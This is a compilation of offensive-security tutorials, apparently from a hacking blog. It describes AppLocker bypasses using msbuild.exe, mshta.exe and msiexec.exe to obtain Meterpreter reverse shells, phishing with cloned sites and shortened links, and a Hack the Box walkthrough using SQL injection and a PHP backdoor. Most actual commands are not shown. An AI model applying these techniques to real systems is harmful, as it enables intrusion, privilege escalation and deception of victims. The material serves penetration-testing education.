Bypass Application Whitelisting using msbuild.exe (Multiple Methods)

This purpose to write this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass.  As we know for security reason the system admin add group policies to restrict app execution for local user. In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with MSbuild.exe.

Table of Content

Introduction to MSbuild.exe

Exploiting Techniques

  • Generate CSharp file with Msfvenom
  • Generate XML file to Exploit MSbuild
  • Nps_payload Script
  • Powershell Empire
  • GreatSCT

Introduction to MSbuild.exe

The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can organize and build products in environments where Visual Studio isn’t installed.

Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj.vbproj.vcxproj, and others) contain MSBuild XML code.

Exploiting Techniques:

Generate CSharp file with Msfvenom

We use Microsoft Visual Studio to create C # (C Sharp) programming project with a *.csproj suffix that saved in MSBuild format, so that it can be compiled with the MSBuild platform into an executable program.

With the help of a malicious build we can obtain a reverse shell of victim’s machine. Therefore, now we will generate our file.csproj file and for that, first generate a shellcode of c# via msfvenom. Then later that shellcode will be placed in our file.csproj as given below.

The shellcode above should be placed in the XML file and you can download this XML file from github, which has the code that the MSBuild compiles and executes. This XML file should be saved as. file.csproj and must be run via MSBuild to get a Meterpreter session.

Note: Replace the shellcode value from your C# shellcode and then rename buf as shellcode as shown in the below image.

You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework. For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.

To know more about MSbuild read from here: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015

Now launch multi handler to get meterpreter session and run the file.csproj file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

Note: you need to save your malicious payload (XML / csproj) at this location:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute this file with command prompt.

As you can observe that, we have meterpreter session of the victim as shown below:

Generate XML file to Exploit MSbuild

As said above that MSBuild uses an XML-based project file format that’s straightforward and extensible, therefore we can rename above generated file.csproj as file.xml and again run the file.xml file with msbuild.exe at the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

As you can observe that, we have meterpreter session of the victim as shown below:

Nps_Payload Script

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. Written by Larry Spohn (@Spoonman1091) Payload written by Ben Mauch (@Ben0xA) aka dirty_ben. You can download it from github.

Nps_payload generates payloads that could be execute with msbuild.exe and mshta.exe to get reverse connection of victim’s machine via meterpreter session.

Follow the below step for generating payload:

  1. Run ./nps_payload.py script, once you have downloaded nps payload from github.
  2. Press key 1 to select task “generate msbuild/nps/msf”
  3. Again Press key 1 to select payload “windows/meterpreter/reverse_tcp”

This will generate a payload in XML file, send this file at target location C:\Windows\Microsoft.Net\Framework\v4.0.30319 as done in previous method and simultaneously run below command in a new terminal to start listener.

Now repeat above step to execute msbuild_nps.xml with command prompt and obtain a reverse connection via meterpreter as shown below:

PowerShell Empire

For our next method of msbuild Attack, we will use empire. Empire is a post-exploitation framework. Till now we have pairing our xml tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our Msbuild attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

Usestager will create a malicious code file that will be saved in the /tmp named launcher.xml.

And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command :

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

The above command will give you the access to the session.

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

Now to see the list of payloads type :

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

Once the command is execute, type :

When generating the payload, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. We had given msbuild as payload name where the output code will be save in XML.

Now, it made two files. One metasploit RC file and other an msbuild.xml file.

Now, firstly, start the python’s server in /usr/share/greatsct-output/source by typing:

Run the file in your victim’s by typing following command:

Simultaneously, start the multi/handler using resource file. For this, type :

And voila! We have meterpreter session as shown here.

Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Bypass Application Whitelisting using mshta.exe (Multiple Methods)

Today we are going to learn about different methods of HTA attack. HTA is a useful and important attack because it can bypass application whitelisting.  In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But today you will learn how to bypass Applocker policies with mshta.exe.

 And to learn different methods of the said attack always come handy.

Table of content:

  • Introduction
  • Importance of HTA
  • Different methods
  • Conclusion

Introduction

For a long time, HTA files have been utilized as part of drive-by web assaults or droppers for malware within the wild. This includes doing something as basic as diverting mobile clients and educating that the website doesn’t, however, have mobile support. HTA files are well known within the world of cybersecurity in perspectives of both red teaming and blue teaming as one of those “retro” ways valuable to bypass application whitelisting.

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with. You can interpret these files using the Microsoft MSHTA.exe tool.

Importance

Finally, utilizing htaccess files or other strategies to divert based on browser sorts will help increase victory rates. Utilizing HTA files for web-based assaults. There’s a ton of adaptability inside an HTA file; you’ll effectively make it appear to be an Adobe updater, secure record per user, and a number of other things. It would moreover be useful to have the HTA file over HTTPS constraining discovery rates for companies not utilizing a few sorts of SSL interception/termination. HTA records helps to bypass antivirus since they are still not well identified. Last but not least HTA can also be used in web phishing, replacing old Java Applet attack.

Methods

There are multiple methods for an HTA attack. And we are going to shine light to almost all of them. Methods we are going to study are:

  • Metasploit
  • Setoolkit
  • Magic unicorn
  • Msfvenom
  • Empire
  • CactusTorch
  • Koadic
  • Great SCT

Metasploit

 Our first method is to use an inbuild exploit in Metasploit. For this, go to the terminal in your kali and type :

Msfconsole

Metasploit contain “HTA Web Server” module which generate malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed. As the Metasploit will start up, type :

Once the exploit is executed, it will give you an URL link with the extension of .hta. Simultaneously, metasploit will start the server which allows you to share the file. This link you further have to run in your victim’s PC. Using the following command:

The usual file extension of an HTA is .hta. We have use the above command because HTA is treated like any executable file with extension .exe, hence, executed via mshta.exe. When hta gets launched by mshta.exe it uses a signed Microsoft binary, allowing you to call PowerShell and inject a payload directly into memory.

Once the above command is executed you will have a session open. To access the session, type:

Thus, you will have your meterpreter session.

Setoolkit

Our method for HTA attack is through setoolkit. For this, open setoolkit in your kali. And from the menu given choose the first option by typing 1 to access social engineering tools.

From the next given menu, choose second option by typing 2 to go into website attack vendors.

From the further given menu choose option 8 to select HTA attack method.

Once you have selected the option 8 for HTA attack, next you need to select option 2 which will allow you to clone a site. Once selected the option 2, it will ask the URL of the site you want to clone. Provide the desired URL as here we have given ‘www.ignitetechnologies.in’.

After giving the URL it will ask you to select the type of meterpreter you want. Select the third one by typing 3.

Once you hit enter after typing 3, the process will start and you will have the handler (multi/handler)

Now convert your malicious IP into bitly link which will appear more genuine to victims when you will share this link with them.

When the victim will browse above malicious link, the file will be saved and automatically executed in the victim’s PC after being saved; as shown in the image below:

Then you will have your meterpreter session. You can use the command ‘sysinfo’ to have the basic information about the victim’s PC.

Magic Unicorn

Next method for HTA attack is using unicorn third party tool. The tool magic unicorn is developed by Dave Kennedy. It is a user friendly tool which allows us to perform HTA attack by injecting shellcode straight into memory. The best part of this tool is that it’s compatible with Metasploit, along with shellcode and cobalt strike. You can have detailed look of the software at: trustedsec.com, and you can download the software from github or just by using this link: https://github.com/trustedsec/unicorn

Once you have downloaded magic unicorn. Open it in the terminal of kali and type:

Executing the above command will start the process to create an .hta file. The said .hta file wil be created in a folder hta-attack/. Go into that folder and see the list of files created by typing following commands :

Now you will be able to see an .hta file i.e. Launcher.hta. Start the python server so the file can be shared. To do so, type :

Once the server is up and running execute the following command in the cmd prompt of the victim’s PC :

When the above command will be executed, you will have your session activated in the multi/handler. To access the session, type :

MSFVenom

The next method of HTA attack is by manually creating an .hta file through msfvenom. Create a .hta file, type the following command in the terminal of kali:

Executing the above command will create an .hta file which you can use to your advantage. After creating the file, turn on python server to share the file to victim’s PC by typing:

Run the above file by typing:

Simultaneously, start your handler to receive a session when you run the above file in the victim’s cmd prompt. To start multi/handler type:

And so, with using such easy method, you will have you session of meterpreter. You can use sysinfo to know them basics of the victim’s PC.

PowerShell Empire

For our next method of HTA Attack we will use empire. Empire is a post-exploitation framework. Till now we have pairing our hta tacks with metasploit but in this method we will use empire framework. It’s solely python based powershell windows agent which make it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empipre framework is started, type listener to check if there are any active listeners. As you can see in the image below that there are no active listeners. So to set up a listener type :

With the above commands, you will have an active listener. Type back to go out of listener so that you can initiate your powershell.

For our HTA attack we will use stager.  A stager, in empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this type:

Usestager will create a malicious code file that will be saved in the outfile named 1.hta. And once the file runs, we will have the result on our listener. Run the file in your victim’s by typing following command :

To see if we have any session open type ‘agents’. Doing so, will show you the name of the session you have. To access that session type :

The above command will give you the access to the session.

Cactustorch

Cactustorch is framework for javescript and vbscript shellcode launcher. It is developed by Vincent Yiu. This tool can bypass many common defences which is an advantage for us till now. The major to thing to note is that the code we use in cactustorch is made through msfvenom and then encoded into Base64 as it only supports that.

So, to start with let’s first make our malware and then encrypt it.

Now to encrypt the file type:

Copy the base64 code as it is to be used later.

Now that we have our malware ready, let’s download cactustorch. You can download it from here:

https://github.com/mdsecactivebreach/CACTUSTORCH

Once it’s installed type the following to the content of the folder installed:

The above command will start cactustorch for hta attack.

Once the cactustorch starts, paste the base64 code, at the highlighted space as shown in image below, which was copied earlier.

As we have added our code, let’s execute the file in our vicitim’s PC by typing:

Simultaneously, start your multi/handler to receive a session. For multi/handler type:

Once you execute the file in victim’s PC, you will have your session.

Koadic

Our next method is using Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. To know more about Koadic please read our detailed articled on the said framework through this link:  https://www.hackingarticles.in/koadic-com-command-control-framework

Once the koadic is up and running, type info to get gist of details you need to provide in order to have session. Through info you know that you need to provide srvhost along with setting endpoint. So to set them type :

Execute you’re the file in your victim’s PC by typing:

And you will have a session up and running. To know the name of session type:

And now to access the session type:

GreatSCT

GreatSCT is tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses. GreatSCT is current under support by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it’s downloaded and running, type the following command to access the modules:

Now to see the list of payloads type :

Now from the list of payloads you can choose anyone for your desired attack. But for this attack we will use :

Once the command is execute, type :

After executing generate command, it asks you which method you want to use. As we are going to use msfvenom type 1 to choose first option. Then press enter for meterpreter. Then provide lhost and lport i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for a payload. By default it will take ‘payload’ as name. As I didn’t wanted to give any name, I simply pressed enter.

Now, it made two files. One resource file and other an hta file.

Now, firstly, start the python’s server in /usr/share/greatsct-output by typing:

Now execute the hta file in the command prompt of the victim’s PC.

Simultaneously, start the multi/handler using recourse file. For this, type :

And voila! You have your session.

Conclusion

So basically, this type of attack is a simple HTA attack provide full access to the remote attacker. An attacker can create a malicious application for the Windows operating system using web technologies to clone a site. In a nutshell, it performs PowerShell injection through HTA files which can be used for Windows-based powershell exploitation through the browser. And the above are the methods used for the attack. As they say, if one door closes another open; therefore when same attack is learnt through different ways are often convenient.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Hack the Box: SecNotes Walkthrough

Today we are going to solve another CTF challenge “Secnotes”. Secnotes is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodology:

  1. Scanning Network
  • TCP and UDP ports scanning (Nmap).
  1. Testing port 80
  • Exploiting 2nd order SQL injection on sign up form.
  • Retrieving all the notes in the system.
  • Retrieving “tyler’s” account password.
  1. SMB (port 445) penetration
  • Accessing victim shell using smbclient.
  • Uploading simple-backdoor.php on victim’s machine.
  • Triggering backdoor via browser.
  • Exploiting newly created RCE using metasploit’s smb_delivery exploit.
  • Reading user.txt flag.
  1. Privilege Escalation
  • Discovering a Windows Subsystem for Linux (WSL).
  • Obtaining bash shell from bash.exe.
  • Reading administrator password from bash_history.
  • Connecting to Administrator using SMB.
  • Reading root.txt flag.

Without any further ado, let’s dive right into it.

First step as always is to perform an nmap scan. We performed an all ports system scan here.

That told us there are three ports open:

80- web server

445- smb server

8808- web server

We launched the website on port 80 only to discover a login form.

After playing around with the page sources and source code checking we didn’t find anything useful.

But there was a sign up option too. We signed up using a random name and password and it seemed to lead us to an account where you could take notes and delete them and also change password.

We tried inserting SQL injection queries in login form and nothing showed up. Then we tried inserting 2nd order SQL injection which is nothing but inserting SQL injection queries on the sign up form itself hoping that the server side script shows any unusual behavior and reveals some database information.

According to PortSwigger: “Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way.

The query that we used was:

It hit successfully and opened up a user account. Seemed like the heading was causing this 2nd order SQLi vulnerability. But it solved our purpose and gave us three notes from the database. The third one had something that seemed like the username and password of a service.

Tyler seems to be a person responsible for people’s queries. After obtaining Tyler’s password the first guess was logging into SMB server running on port 445.

For the purpose we used smbclient. Once we successfully logged into the system we listed the directories using ls command.

This seems like a different website than the one on port 80. Maybe this is the one on port 8808.

So, we uploaded a PHP RCE payload called “simple-backdoor.php” that is present in Kali Linux in the directory: “/usr/share/webshells/php” using the put command in smb shell which allows us to run windows commands remotely on the server.

It was now time to trigger the backdoor we just uploaded to check if RCE is even working or not on the server.

It seems to be working just fine! Now on a new window in the terminal we run metasploit.

We are looking for an exploit called smb_delivery that triggers RCE on windows and gives a meterpreter session.

This is only one of the multiple ways through which you could exploit SMB. You can explore multiple ways to do so in our article (SMB penetration testing (Port 445)) here.

So essentially what happens here is that after setting up an LHOST and SRVHOST msf generates a one liner that we’ll copy on the RCE vulnerability and will trigger and give us meterpreter.

Here, 10.10.14.9 is my local IP.

Alright, so we did as metasploit asked us to do and ran the rundll32.exe command on browser where we had RCE vulnerability.

Side by side, we checked our terminal and we had gained a meterpreter session! To confirm we are in the windows server we ran sysinfo and pwd to check the current directory we are in.

After playing around a while in the machine, we found user.txt on Tyler’s desktop! But we are only half done till now with no clue where to proceed ahead. Although, a file called bash.lnk caught our attention which is a link to bash and this is weird. What is a bash file doing on windows system? We proceeded to download the link file on our system and read what’s in it.

The language of the link file seemed quite unreadable so we used the strings command to read the bash.lnk file which eventually revealed a link to bash.exe!

We thought the path to bash.exe was C:\Windows\System32\bash.exe but it was not! The file was missing from the path. We didn’t want to traverse the whole system manually so instead we used the where command.

Where command gave us the exact directory of bash.exe and after executing it, we received an improper teletype of bash!

We used the python one liner to spawn a proper teletype and proceeded further to read bash_history.

It told us in clear text about a user Administrator and its password!

 

It is only obvious now that we have to login to Administrator using smbclient command we found in bash_history to get an admin’s smb shell!

Final steps: We traversed the directory to Administrator’s desktop and downloaded root.txt using smb’s “get” command. And there it was! The final flag!

Hope you enjoyed this walkthrough. Do leave a comment with your thoughts and have a nice day!

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

Bypass Application Whitelisting using msiexec.exe (Multiple Methods)

In our previous article, we had discussed on “Windows Applocker Policy – A Beginner’s Guide” as they defines the AppLocker rules for your application control policies and how to work with them. But Today you will learn how to bypass Applocker policies. In this post, we have block cmd.exe file using Windows applocker Policy and try to bypass this restriction to get command prompt as administrator.

Table of Content

Associated file formats where Applocker is applicable

Challenge 1: – Bypass Applocker with .msi file to get CMD

Little-Bit more about MSI file

Multiple Methods to get CMD

  • Generate malicious .msi file with Msfvenom -1st Method
  • Generate malicious .msi file with Msfvenom -2nd Method
  • Generate malicious .msi file with Msfvenom -3rd Method

Challenge 2: – Make a local user member of Administrative Group

  • Generate Malicious .msi file with Msfvenom -4th Method

Associated file formats where Applocker is Applicable

Windows applocker is a function that was introduced in home windows 7 and windows server 2008 r2 as a method to restrict the usage of unwanted Programs. In this an administrator can restict the execution of the  following programs:

It depends entirely on the system admin which program or script he wants to set the applocker policy for program restriction or execution. There could a situation where Command Prompt (cmd.exe), or Powershell or dll file or batch file or rundll32.exe or regsrv.32 or regasm and many more are blocked.

Challenge 1: – Bypass Applocker with .msi file to get CMD

Let’s suppose you are in a similar situation where all the above mentioned application is blocked and only Windows Installer file i.e. the.msi extension is allowed to run without any restrictions.

Then how will you use an msi file to bypass these restriction and get a full privilege shell?

Little-Bit more about MSI file

The MSI name comes from the original title of the program, Microsoft Installer. Since then the name has changed to Windows Installer. An .MSI file extension file is a Windows Package Installer. An installation package contains all the information required to install or uninstall an application by Windows Installer.Each installation package contains a .msi file, which contains an installation database, a summary information stream and data streams for different parts of the installation.

The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.

The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.

When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.

Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.

Multiple Methods to get CMD

Generate Malicious .msi file with Msfvenom -1st Method

Now let’s open a new terminal in Kali machine and generate a malicious MSI Package file as cmd.msi to get command prompt through it by utilizing the Windows/exec payload as follows:

Now transfer cmd.msi file in your Windows machine to obtain the command prompt shell as administrators.  Here we have used Python HTTP server for sharing file in the network.

Once you have downloaded the.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /quiet /i <path of downloaded .msi file>

As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt.

 

Generate Malicious .msi file with Msfvenom -2nd  Method

Note: Even if you rename cmd.msi file in another extension, it will bypass the rule and start a command prompt as an administrator.

Repeat above to generate an msi file with the same payload as msfvenom and named cmd.png. Since I already have a cmd.msi file in my kali, I rename it as cmd.png and use a python server to transfer it.

Once you have downloaded the cmd.png file (which is actually an .msi file) on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /q /i <path of downloaded .msi file>

As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt .

Generate Malicious .msi file with Msfvenom -3rd  Method

In above methods, we obtain a command prompt by utilizing the Windows/exec payload but now we will use windows/meterpreter/reverse_tcp payload to get full privilege command shell via meterpreter sessions.

Now again transfer shell.msi file in your Windows machine to obtain the command prompt shell as administrators and start multi/handler.  Here we have used Python HTTP server for sharing file in the network.

Once you have downloaded the shell.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /q /i <path of downloaded .msi file>

As soon as you will hit the above mentioned command inside run prompt, you will get the Command Prompt as administrator via the meterpreter session using this exploit!!  

Challenge 2: – Make a local user member of Administrators Group

Let’s suppose you are in a similar situation where all the above mentioned application is blocked and only Windows Installer file i.e. the.msi extension is allowed to run without any restrictions.

Then how will you use an msi file to bypass these restriction to make a local user member of Administrators Group where cmd.exe is block?

Note: Here aaru is a local user account which is not non-administrative user account as shown below:

As we know that due to applocker execution rule policy, cmd.exe is block on the local machine, therefore we cannot use command prompt to add aaru in the administrator group.

Generate Malicious .msi file with Msfvenom -4th  Method

Generate a MSI package as admin.msi with the windows/exec payload that sends a command instructing to add local admin privileges for the user “aaru”, to the target machine.

Now transfer admin.msi file in your Windows machine to add aaru in the administrators group.  Here we have used Python HTTP server for sharing file in the network.

Once you have downloaded the admin.msi file your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the.msi file with msiexec.exe inside the run prompt.

Syntax: misexec /q /i <path of downloaded .msi file>

As soon as you will hit the above mentioned command inside run prompt, you can ensure that the aaru user has become part of administrators account.

Hopefully, it becomes clear to you, that, how you can use an .msi file to compromise an operating system where cmd.exe and other applications are blocked by administrator.

References:

https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here